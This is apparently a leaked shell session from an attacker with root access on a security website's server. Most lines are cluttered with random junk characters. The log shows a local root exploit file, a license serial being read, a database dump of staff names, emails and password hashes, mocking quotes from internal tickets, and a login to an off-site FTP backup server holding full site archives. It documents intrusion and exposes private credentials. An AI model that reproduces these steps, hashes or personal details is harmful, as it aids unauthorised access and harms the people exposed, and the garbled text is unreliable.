' b* Z; r, d7 J3 Pdrwx–x–x 10 com com 4096 Apr 28 12:40 .9 \! p. I4 Q* m, [; I
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
+ U% Q+ V) e) V, Udrwx—— 2 com com 4096 Jun 4 04:04 backups4 X7 z1 |& M3 ?9 {: U
-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql
; U% w+ q& l8 M2 Qdrwxr-xr-x 2 com com 4096 May 12 15:20 backup_system
+ V$ l# B+ r0 a2 A- C' i-rw——- 1 com com 21880 Jun 2 08:07 .bash_history
2 p- b2 h+ B) G: y-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout
' g4 E* x8 f1 B-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile
! W9 E8 t; p' y6 e- {-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc6 E. o& v9 j% q% n; ` m
drwx–x–x 3 com com 4096 Jan 29 2008 domains: \5 `8 H- u( e: g
-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed
& t; z, Z E% k& k0 Hdrwxrwx— 3 com mail 4096 Jan 6 19:24 imap& Q5 ~7 W% ~; E/ }9 q1 |0 P
-rw——- 1 com com 69 Nov 18 2008 .lesshst* Q& i C% [4 [
drwx—— 2 com com 4096 Sep 24 2007 mail
8 j8 ?0 r. h- V( l4 Z! L1 c-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history
# F S5 G% t2 rdrwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp" x4 S' [/ v( V1 E1 C: ]
lrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html
3 q4 t. p1 u" b* N: b0 d1 o-rw-r—– 1 com mail 34 Sep 24 2007 .shadow
: @: I. p- y# a% Adrwx—— 2 com com 4096 Aug 26 2008 .ssh
# v ~; a+ y% s, r8 O! v-rwx—— 1 com com 8515 Feb 10 2008 t
9 J6 R7 P' I8 Z/ _' k& `-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c. J% e8 c" T. N; |0 Y2 Z! V
drwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp, x) {1 F5 u' a4 h
-rw-rw-r– 1 com com 617 May 20 2008 .toprc) Q8 g* w5 b# X L, Y
-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql5 G) p& q* F3 [2 a# L- P: Q& K' n/ d# S
-rw——- 1 com com 16629 Mar 28 21:46 .viminfo
9 `- ~& c4 K9 p7 w& ]- S-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc: @$ ?8 q- L" Q* o9 _7 }' l- x* y
& J' x& ^: e3 P6 L8 P/ R
sh-3.2# head t.c
6 e$ V L: I: M$ E+ d6 h/*& s$ J _: f" N1 \, h# d5 N
* jessica_biel_naked_in_my_bed.c2 M$ ]4 r/ A% l- b' q. X
*# }+ ~9 u m T$ M& S% z. L
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
* P& F, A- |" b$ Q* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.( X6 n* A9 c$ L) {# c7 v; w+ ]
* Stejnak je to stare jak cyp a aj jakesyk rozbite.
7 F9 m# [ F9 L/ z, i*3 }% c# K* w. q2 K. m. W" i/ D
* Linux vmsplice Local Root Exploit" A. \" E" ]! P1 m
* By qaaz; K) l- a. J9 y4 u) M
* Y l6 O! ~9 X {2 W& g; F1 M
9 C6 @6 o. e& ]
sh-3.2# cd /
' u6 M) E0 l C: Y2 N Tsh-3.2# ls -la; m# S+ V! V7 W
total 360* u3 k8 Z5 t. R8 O: Y9 V* W
drwxr-xr-x 25 root root 4096 Jun 3 02:43 .
5 I+ s5 T( F0 S1 X0 h1 ]" mdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..! P d, A! t+ F. F6 T( ^& k
-rw——- 1 root root 10240 Jun 3 02:39 aquota.group: q, | }6 h, p4 i3 k
-rw——- 1 root root 10240 Jun 3 02:39 aquota.user3 w$ T5 _( ^: ~) @, n; U' Y
-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db$ \( o' L" ]/ r( X7 v/ A
-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck* ^' w' J$ [5 m- @2 a/ F. n
-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel
4 ~6 X4 _$ l% U2 j' l* G% Cdrwxr-xr-x 3 root root 4096 Dec 29 2007 backup
/ C E+ T3 m2 Y; h J* t8 C; qdrwxr-xr-x 2 root root 4096 Jun 4 04:03 bin
5 k& [' N( ]# Mdrwxr-xr-x 5 root root 4096 Jun 2 14:06 boot
% V) m8 U+ o; hdrwxr-xr-x 11 root root 3620 Jun 3 02:43 dev9 U6 R3 O. Z) _
drwxr-xr-x 84 root root 12288 Jun 4 03:16 etc
% F$ q! T& n; x4 v# c3 T5 r4 @+ Rdrwxr-xr-x 14 root root 4096 Mar 11 17:56 home$ t; D9 C5 @9 b7 H" T- Q. G
-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf4 n9 q0 J, d' n* Y
drwxr-xr-x 11 root root 4096 Jun 4 04:02 lib& D) X3 L' A' P2 g; F- v
drwxr-xr-x 7 root root 4096 Jun 4 04:03 lib64$ l* l9 P7 A& y4 b6 {, T/ r% J
drwx—— 2 root root 16384 Sep 11 2007 lost+found
5 v d! k. y# q! @5 ?. M# B/ B( u Ndrwxr-xr-x 2 root root 4096 Mar 11 17:56 media
0 _$ X3 Q i7 V) z+ m# i% Bdrwxr-xr-x 2 root root 0 Jun 3 02:43 misc; k: l* V9 E% t" a( h: x
drwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt' y1 [% z" s+ U" t1 V- X
-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg* I6 W7 H: G g6 d
drwxr-xr-x 2 root root 0 Jun 3 02:43 net
' T. f" }6 t9 @6 g" [drwxr-xr-x 3 root root 4096 Mar 11 17:56 opt: m3 j7 z: n& H+ }+ o
dr-xr-xr-x 264 root root 0 Jun 3 02:42 proc' u8 U0 z$ O$ T, u2 ]4 @, m9 j. K! D
drwxr-x— 15 root root 4096 Jun 4 08:40 root* w D6 n: h* H' f
drwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin
. K7 _* A) _$ R' ~7 Idrwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux. g( n9 P( l0 k* V9 a) d1 F
drwxr-xr-x 2 root root 4096 Mar 11 17:56 srv
8 g/ \! k. D2 adrwxr-xr-x 11 root root 0 Jun 3 02:42 sys
R' s# t* C5 ]) R! f7 V9 E. fdrwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp ?9 b, S& h: O. E; e+ J$ A
drwxr-xr-x 16 root root 4096 Jun 2 13:56 usr
% X4 K5 s2 \5 Q* Vdrwxr-xr-x 26 root root 4096 Jun 4 03:16 var
/ }; I& g. F/ ?& \! {5 C* p( U6 _9 j( I' D/ T& v" |6 p. g p
sh-3.2# cd opt
- u# M$ f& O+ d' Gsh-3.2# ls -la
/ `: C) l) _) `: k. L$ v8 N: Htotal 20% d1 D/ f$ U- a9 u- {
drwxr-xr-x 3 root root 4096 Mar 11 17:56 .4 _* {; g' D; z, {% N; J! b
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..# D* [8 p- B' C2 F. A* c
drwxr-xr-x 15 root root 4096 Mar 20 2008 lsws
6 c) _0 y+ t! E( v- o ?* q+ v, {+ L1 n- `
sh-3.2# cd lsws/
+ Z( F* {* l5 z1 h5 l! H- Tsh-3.2# ls -la* K8 ?/ `6 \! g O7 e3 ^% }
total 108
( C3 L/ T& }. C$ @6 i; ]drwxr-xr-x 15 root root 4096 Mar 20 2008 .
; d1 }% r/ C) S s1 Gdrwxr-xr-x 3 root root 4096 Mar 11 17:56 ..
) g. P: L& T3 d2 Q* R8 E. @* p; I0 adrwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons
2 ^* L, X* ^) T9 W; k3 ]: G2 ^( |& }drwxr-xr-x 13 root root 4096 May 29 15:10 admin
2 g$ q' o% b) L$ \2 g Odrwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate
8 {# a4 ~- U5 q0 L/ U% x5 Q3 |drwxr-xr-x 2 root root 4096 May 29 15:10 bin* [% F y3 ^! }$ N0 M7 r" ^/ \
drwx—— 4 apache apache 4096 Jun 3 02:43 conf
$ L7 C7 i: C! Jdrwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT
/ a7 F5 K& i Cdrwxr-xr-x 2 root root 4096 Sep 15 2008 docs
6 u; H3 f3 C6 U! M Fdrwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin
* x2 J% i. T" [4 v* \drwxr-xr-x 2 root root 4096 Sep 15 2008 lib
. Z5 d7 g) Y) N' L' Y-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE' |/ ^5 R$ m4 o
-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP g7 D% F) D0 v, q
-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL# \/ E( g9 X5 @! ~6 [9 U" w+ o! p7 @
-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP
( i0 E$ h, F9 V- x& b5 K8 i+ vdrwxr-xr-x 2 root root 20480 Jun 4 09:55 logs
! f+ Y) g; Z' M, f& [# j" @7 W. Mdrwxr-xr-x 2 root root 4096 Mar 20 2008 php* R% r) | `- j
drwx—— 2 apache apache 4096 Mar 20 2008 phpbuild1 ]) v! U4 O& c. @3 W6 s
drwxr-xr-x 3 root root 4096 Mar 20 2008 share
( S. Z! a- V8 _0 p' M4 S7 Z. @-rw-r–r– 1 root root 6 May 29 15:10 VERSION+ i; I# l5 L, H F: c) w
+ g; K5 j! z8 ]; X! t x) T0 i6 q
sh-3.2# cd conf
, W& a& [( j: ]) X& E4 r4 Ksh-3.2# ls -la
9 [& w& \( n7 r) z& `4 d- G( ctotal 48
3 _" S3 V9 q a X" i0 Zdrwx—— 4 apache apache 4096 Jun 3 02:43 .
; m1 m! U+ s" ?+ l3 z( u3 q8 Wdrwxr-xr-x 15 root root 4096 Mar 20 2008 ..6 }6 O! w! F& {9 N! ?" }& C4 T I
drwx—— 2 apache apache 4096 Mar 20 2008 cert
|4 S+ g* s9 q4 G-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml$ N9 ^" R) w0 q
-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak% r1 B4 V. ?; p& S) h8 R
-rw-r–r– 1 root apache 0 Jun 3 14:11 .last. B5 R2 M4 z5 d) p
-rw——- 1 apache apache 256 May 29 15:10 license.key$ c. }' A. T0 v* l" W- }3 m( B
-rw——- 1 apache apache 256 Mar 21 2008 license.key.old! h) M7 V" W( l/ X0 D6 p
-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties/ A# u6 B" Q7 I. `# P
-rw——- 1 apache apache 20 May 29 15:10 serial.no1 `) ~6 Q' }- t
drwx—— 2 apache apache 4096 Mar 20 2008 templates2 i5 b7 } r8 R5 t- E3 r
" b4 W% u/ z& c) R. @+ lsh-3.2# cat serial.no) y% x0 A4 q, A+ I. ~$ } f8 |
IbDl-oVsO-CKqL-wVRa; x5 M7 P7 z6 C! m ^
1 F6 _+ r: E% }/ ~( y- Q8 ish-3.2# mysql7 T9 N3 \. h2 M8 d
Welcome to the MySQL monitor. Commands end with ; or \g.& Z3 J2 v6 q7 A6 @2 v
Your MySQL connection id is 286844
+ n# E) r& a8 X1 Y9 GServer version: 5.0.45-community-log MySQL Community Edition (GPL)3 }# k0 ^# q( i8 Q) D7 U/ |& g
+ o* u6 D. k+ [' V; D; SType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.$ ~8 Y8 S5 ~( W1 g `
* C% R9 B+ O* k7 Zmysql> show databases;
4 H# k: w v& y/ K+———————–+
& N' m; S- O. R| Database |
5 x0 x8 L- B4 g( L! K, X* q& Y+———————–+
1 }; q0 o! u. j, h1 o' P* X| information_schema |
: R7 z* @& ?7 n| astanet_ads |
s6 C) w% Y: L5 E| astanet_mailing_lists |
0 e0 W. O( D: N7 P| astanet_mediawiki |* W$ v0 ^6 w9 a N" f
| astanet_membersystem |
! M( V4 ^+ X# b| com_contrexx |2 C. x8 B0 e# @# }; T
| com_contrexx2 |4 o; W, e1 l) G, j6 X/ H
| com_contrexx2_live |7 U( g. Y( G" B. g8 w
| da_roundcube |
1 |! I9 L8 z4 J( t; [| dolphin |
: Y! u& f1 n- }. Q' }| ideapool |! L+ @6 h# M+ M6 \
| mysql |7 d- Z% _5 E" k
| test |
: E4 [6 e. ~$ A, d l& @- _1 A| yourmaster |
% _0 _! M* X. t r% ?" ?2 z+———————–+
" @8 p& q1 K# \5 l* c: A14 rows in set (0.00 sec)
" Q( R3 S' d& A. W- T2 @! K% N0 p5 l% ^' e& @
mysql> use ideapool: o/ Z7 S, J0 c x( H! D$ h2 f
Database changed
- h4 k' E0 G" u i0 W' q R% Vmysql> show tables;
( A. A* |. L% `% h' y& T$ W; e+———————————–+# J, F$ `7 U' L3 `: _! y; G
| Tables_in_ideapool |
' W! [, R3 Z" O4 K! c8 g' r+———————————–+
/ ^3 M( K1 d& h" z5 s* y3 t0 P| eventum_columns_to_display |$ m( \( A/ f5 E+ J
| eventum_custom_field |4 s: A. n! `/ i: x; ]0 H5 A
| eventum_custom_field_option |
X: R; D8 C) E| eventum_custom_filter |
8 F$ t& G' h4 j$ m. ?| eventum_customer_account_manager |3 r9 u2 O$ c4 D I! \; G' `/ Y* v
| eventum_customer_note |
! } e9 w$ ?% }. l. O3 E| eventum_email_account |
' N5 Z/ i+ o. ^ Q+ F7 D8 J( Y3 d$ i| eventum_email_draft |5 c i" d! B' S0 y) }
| eventum_email_draft_recipient |
' V0 z6 [) {& I9 A| eventum_email_response |
8 [3 u: q( i+ B' X0 f4 { Y| eventum_faq |; r, s+ r `( ^+ }( {, J1 |! {
| eventum_faq_support_level |2 ?- R! Y4 y6 G1 }( }! I2 V
| eventum_group |
* f: m# g+ B- Q| eventum_history_type |# H! }; A* u1 i+ y
| eventum_irc_notice |
1 V' {2 O7 T3 H| eventum_issue |( ]' \4 c3 j3 w8 f
| eventum_issue_association |' O0 o, m3 j: d" P6 ^# Y1 d
| eventum_issue_attachment |
8 q, g2 w4 r6 n0 ?4 N. F| eventum_issue_attachment_file |
+ t( ?" A9 H+ q% c& f| eventum_issue_checkin |" V. Z; F& D6 j: ^* W- t. N9 U
| eventum_issue_custom_field |/ N' i6 P- Q7 M+ g8 }
| eventum_issue_history |1 S; b7 {0 n% X7 A( D* n8 c! d `6 f5 J
| eventum_issue_quarantine |
: M9 P/ U, o" A, N9 d6 L( y4 b| eventum_issue_requirement |8 q$ f+ I$ V5 S; E: p
| eventum_issue_user |& C6 o$ @4 ?0 H! h7 s6 `( U3 ^
| eventum_issue_user_replier |2 b1 a. C1 X) l0 R7 _* A+ V
| eventum_link_filter |
4 m! R( O( B! w4 P( t| eventum_mail_queue |
& s" w/ P1 P/ \- ?| eventum_mail_queue_log | W s- Q& r, l7 Y- C* F: [+ d+ U
| eventum_news |* `1 W1 U2 e# Y0 I
| eventum_note |7 F7 A" R1 t1 |& S! p7 M2 U J
| eventum_phone_support |4 {: y2 B% W5 s1 L
| eventum_project |
' i+ f- X- B3 }+ a| eventum_project_category |
8 E! Q: s, t9 L, _| eventum_project_custom_field |: o9 o5 P9 ?' [ V
| eventum_project_email_response |& h9 Z4 D, k: R2 N$ \
| eventum_project_field_display |6 `. `0 O2 X2 H4 D) S' E% C/ a
| eventum_project_group |
7 v) N4 N3 _( T1 X/ R7 B5 m+ x N8 t| eventum_project_link_filter |- _: O# ?! _. V z
| eventum_project_news |! G7 O U* v1 G& R
| eventum_project_phone_category |0 w3 O1 D2 A7 s( F6 M6 ]' y
| eventum_project_priority |! Y& Z6 T% f7 W8 e" P. w Z9 M
| eventum_project_release |
* ?* g- D" V$ C4 K; u5 Z| eventum_project_round_robin |9 D7 H: ^, z4 A, |2 z* \3 C s
| eventum_project_status |
: u! U' v- m: O5 i7 f. l| eventum_project_status_date |
j1 ]/ Q8 j i| eventum_project_user |
% Z) f4 \7 h7 o* ~$ I| eventum_reminder_action |
2 |# O$ _% ~( P| eventum_reminder_action_list |
" U( X2 D3 E& \7 }" Q| eventum_reminder_action_type |/ K3 t1 H+ J: V5 Q$ {5 `7 Q* I
| eventum_reminder_field |
* P9 l5 H, X7 s' _| eventum_reminder_history |
1 \: y' a" y0 h: r! D| eventum_reminder_level |' r; J2 o- A0 E- D0 D+ I* z8 L
| eventum_reminder_level_condition |
9 l# j c4 H- @# v4 M# ^. J| eventum_reminder_operator |
" B3 S G6 J+ R' z, H0 r| eventum_reminder_priority |
9 Y5 [* G5 [$ \7 q. O| eventum_reminder_requirement |5 c" S" ]% ^" a* U
| eventum_reminder_triggered_action |# c: f" c2 K! A% i' J2 F% d/ P
| eventum_resolution |
; r4 V! R; N* ^0 M2 a| eventum_round_robin_user |6 l: ^0 P& v/ m+ M) s7 ]
| eventum_search_profile |
]9 [7 a4 \8 T9 G4 s8 A| eventum_status |9 [! j. |# g0 t" A+ h# ?, Y
| eventum_subscription |
0 L0 X, v9 m3 S7 Q# N| eventum_subscription_type |0 P* r8 j" w4 `4 w/ Y5 r
| eventum_support_email |5 |3 O9 i; S, Y- U# S) p6 j9 z
| eventum_support_email_body |
3 V6 P- z! ^0 Y6 d" ]; j, X| eventum_time_tracking |
3 |, \8 [ N5 f| eventum_time_tracking_category |
3 F% j/ _2 [. P| eventum_user |& b1 ~; z3 w2 w2 [
+———————————–+
/ u" |6 U5 U% `. E& T69 rows in set (0.00 sec)& s- Y; p0 {, \+ }
- R2 J& a* v( n5 Zmysql> describe eventum_user;/ f* O1 U% y% R+ V* c' [& f
+————————-+——————+——+—–+———————+—————-+
" W/ E s, [5 U) E| Field | Type | Null | Key | Default | Extra |
" Q1 [6 U' U7 H% W+————————-+——————+——+—–+———————+—————-+. L8 ^$ N O7 K3 X1 k
| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |
+ U* Z: }) |* {5 S! w| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |" ?) O# I5 t- C
| usr_customer_id | int(11) unsigned | YES | | NULL | |1 F- d* H. Z2 e' f4 o$ i/ ?
| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |5 n# p/ y5 A; u/ d3 H6 ~
| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |) M6 C B* }1 O' j7 l/ R+ |
| usr_status | varchar(8) | NO | | active | |* G$ m8 v% j7 \4 X' U2 b9 f
| usr_password | varchar(32) | NO | | | |% h( j8 L: n# N4 E3 Y
| usr_full_name | varchar(255) | NO | | | |' j) z4 g; J" Q& l' I0 l
| usr_email | varchar(255) | NO | UNI | | |
' g2 ]5 G& U) e7 j| usr_preferences | longtext | YES | | NULL | |
1 x! [$ j8 u2 `/ x| usr_sms_email | varchar(255) | YES | | NULL | |
8 \+ R- A; }6 t) S| usr_clocked_in | tinyint(1) | YES | | 0 | |
0 p' L" O1 I& C4 B| usr_lang | varchar(5) | YES | | NULL | |, F2 U) A0 F) a" H6 X$ j
+————————-+——————+——+—–+———————+—————-+
% ^6 e% X# o0 `13 rows in set (0.00 sec)( q6 k7 R7 d9 C! ^
2 G: |/ y# `( D2 _ `% `mysql> select usr_full_name,usr_email,usr_password from eventum_user;
9 _+ Q# o, v3 ]( x& h( @+———————-+——————————-+———————————-+
& c3 s0 ~! S1 D! C| usr_full_name | usr_email | usr_password |5 w. J) n; l/ v3 G5 O
+———————-+——————————-+———————————-+
1 @. V* F. H# N$ l| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |
; h. ?& g, f( _2 d| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |* r1 C+ V x! B1 z( [; h
| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |8 V1 A" W* F9 B' i/ Y
| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |
; ]: {: D% Z1 ]* o/ T: l| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |
8 J: ]8 P2 m8 l| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |
) I5 X& X# w1 ?- k, m7 P* |; C% j| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |
/ m7 J1 h' ]% ]2 L7 R8 P% I; ~" ?% h| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |
l# }! G' h) T o1 Q| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |
! O0 l: ]6 O9 K| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |' s. T+ z7 ~8 X
| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |
) ^4 f( Q9 w' m: b0 N6 e| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |3 B% l+ ~+ \ }/ V
| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |
/ W$ `3 _+ X. r r| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |0 X! n0 K9 E( _* ~! C2 I! V3 B; P) b' A+ R
| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |; A( f9 t! i' F4 [2 q: G/ w
+———————-+——————————-+———————————-+* r* B! n3 U0 J1 q
15 rows in set (0.00 sec)
0 s6 p2 x/ o7 `2 k
7 Y9 Y: c1 q/ H* F5 ]: U* }/ amysql> select iss_description from eventum_issue where iss_id = 43;4 \4 J/ ]$ t% m# t+ y9 i
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+% {; s# w5 N9 u% y; a( I
| iss_description ) w' |& z9 E3 a9 `6 \9 I( M2 e
|
6 ^. u/ u" A: p+ E% F8 |7 @) Q+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+3 U7 C7 ^- [' M1 \. S3 Z# X
| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be
. T) r' Y9 g4 @7 B* ]. i ~connected for 90 mins… 120mins… so what i propose is something like:
- a% v; ?6 W1 Y9 ?& G5 I6 A5 U链接标记[url]http://www.surfthechannel.com/[/url]
5 E- {) P- ^$ j) j9 dsince they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system* T7 [! g2 l8 [. V4 P. D
like podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t
/ I- n M7 t, N. b& ~: [break any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off
/ I' K) g6 l/ n4 r% j# oif they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…; ]# _; p( C" _* T/ Y4 M
$ Y- s* s& x1 M2 k0 ?We could also put advertisement during play on the flash video player itself… extra $$…
( ~* P7 {2 A- C5 |9 B4 [( O# ]* R3 Z; Z7 J8 v
By sykadul |9 g) l5 X2 k/ X4 ^8 ~, a
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+* @) x* t- x* S2 x- C
1 row in set (0.00 sec)* i: B) \$ N8 x2 M8 z
/ s. X- y3 l0 J6 G
// Money and extra $$ is all they care about. remember that.$ T/ S2 b! @. R" o
: T+ K# K" j. B
mysql> select iss_summary,iss_description from eventum_issue where iss_id =42;
) t3 ^: e& ^& }* ]+————————+——————————————————————————————————————————————————————————————————————————————-+) _( Y2 u! `6 q# z4 J1 o
| iss_summary | iss_description 1 S n. H0 M$ t7 |0 w! C$ j7 i( v
|
0 c, K% H4 ~9 s9 M+————————+——————————————————————————————————————————————————————————————————————————————-+8 N" u) o$ b' z# \3 }
| Forum for REAL EXPERTS | Hello,
3 I: X2 w6 n" c. a3 H
3 `. `. k* r+ K( z8 X' D" CIshtus and I,
- C( Q/ |$ |5 F5 [' B% M( i9 E Z' e; B$ I7 c
Came up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide
$ s) J" T0 F' e; ~1 P5 pONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..
5 {7 i) T' c5 C' u
3 F6 ]" Y% d5 S, c& G4 N' m; L. VOne example a friend of mine from coresecurity.com!
% } B% m9 [6 S, M# g' ]! O; `5 ]" p8 }7 b8 ^ `, q
We could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..
, c% |: c! l/ S+ x0 H( t( i6 X" ~4 y4 j6 R; d( @
|
k. U" E% T) ]' X" d- U. a+————————+——————————————————————————————————————————————————————————————————————————————+/ ^* p$ e) u, ^( B& y+ r5 l" K
1 row in set (0.00 sec), a! Z; s4 s2 o* v& `6 N
/ K' D8 E0 R# B( N6 T
// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…
/ M) T9 S- \: I$ z6 ?1 I" n7 L! j: F5 K( D4 n3 T4 {
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;2 H0 }. v- k J; M7 N6 ]" ~+ _
+——————+———————————————————————————————+
0 q1 @; ?% f/ A U# n" R| iss_summary | iss_description |+ N, p u) S3 p G2 Q
+——————+———————————————————————————————+3 a5 {4 l4 N8 A) H
| Website guidance | Virtual Girl which guides you trought the website.; ~7 F3 K8 N- Y, t2 ~
w0 x! \8 g. EWe need a girl with who you can ( talk )!!!
6 W: h. F# |1 H) Z% ^3 I# vAlso for the News!
/ d: J$ X% O1 G7 t* KSo my suggestion is a girl who read you the news loud if you like!$ K" l: m8 |5 k3 V
you can choose between read yourselfe or she read it for you or both!
- ~( m* E* p% k7 r+ ^. C* A; M
' l1 P q. z9 W2 W9 N* Q9 d) N5 m, AGo to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!& V' Y0 [/ ?$ y; E
3 z, s' v# B: h* n
Have a look on the example girls!!$ T% f* |- \% N) Y
0 O7 w- q% n/ m链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]% n. Q/ Y3 C* L/ }0 \0 j: @" o
7 w) R' q) O9 tor that! Z$ p# g1 n7 w
: @& |+ W6 f9 P" F6 K3 Z链接标记[url]http://www.yellostrom.de/[/url]$ m7 [3 }# S7 u' _
3 v) Y7 U$ G3 ^" r6 a|
0 L& t& ^) r4 v2 J: G4 i- M+——————+———————————————————————————————+7 Y3 I1 z3 C* |6 J) j5 x
1 row in set (0.00 sec)9 c, a* l) C: |2 U
2 ?3 h5 J, k' b2 o; A0 J6 X// ha ha.+ s; F# `7 {( _& i' J$ L
! K6 N; }; y7 K0 \* F
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;
2 K/ {* {& t' C- B$ l+————————–+———————————————————————————————————–+
$ L$ K) e; h1 d- H. J# u1 Z| iss_summary | iss_description |
; h8 p2 M" `. k+————————–+———————————————————————————————————–+4 F% p) a0 T$ `7 ?, n; V/ R) j
| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |% G: U- B) `' t( ?/ ?1 X
+————————–+———————————————————————————————————–+" V* T6 C+ [$ K( {& ?3 z, B
1 row in set (0.00 sec)
0 n% X* g( a" o; l: t" t) o* r. ^
3 @; h8 j2 K b. Z( D// LOL.% \. ^# P# ?2 d% E
0 c$ F1 x: G% n5 e7 G
mysql> exit2 r/ K- U$ l% b7 ]. L# {% {
Bye
! @: Z( i3 c% A4 u7 C" w; s B2 X0 D% j& o
sh-3.2# ftp 212.254.194.163; n( {6 P1 X9 c M m t
Connected to 212.254.194.163.
# p. x) C! k+ W0 G6 J; u1 _% K220 BackupCOM_VW FTP server ready.
* [6 l3 K ~ I3 K/ k% I! P! t504 AUTH: security mechanism ‘GSSAPI’ not supported." J ^6 f- y1 p9 U! M+ d
504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.
+ v/ q& [, P' A0 _KERBEROS_V4 rejected as an authentication type6 ~3 z5 X& `& j% p1 I; Y
Name (212.254.194.163:root): astalavista.com* u) W6 l! S5 w3 |
331 Password required for astalavista.com.
( ^/ a$ C7 |" Q, KPassword:
) }7 Z6 \0 H( s230 User astalavista.com logged in.' C1 o8 d; R# I3 i+ k
Remote system type is UNIX.0 L! m% u/ J5 C
Using binary mode to transfer files.: K+ N: }+ v6 w- L+ ^, L5 F
ftp> ls -la
( |6 G1 u& a( _' y0 k3 E% G/ s227 Entering Passive Mode (212,254,194,163,2,188)
+ ]$ \/ t9 X: x7 s150 Opening BINARY mode data connection for ‘file list’.& z: x) ]2 c8 @+ E( c) _7 u
dr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com
- w, a6 a3 C. x C4 P226 Transfer complete.
& P) m+ J8 S) u) x* Sftp> cd astalavista.com
& O8 h( N& y# G4 M$ V250 CWD command successful.
5 {' Y( T [9 D5 Eftp> ls -la
& Z: M& H, D, U227 Entering Passive Mode (212,254,194,163,2,189)1 a4 Z0 C5 ~: g2 A0 W H' Q/ _
150 Opening BINARY mode data connection for ‘file list’.' o" s4 E& ~( x* F
-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar
4 J7 a& e* {8 \- d( F1 s! W-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2
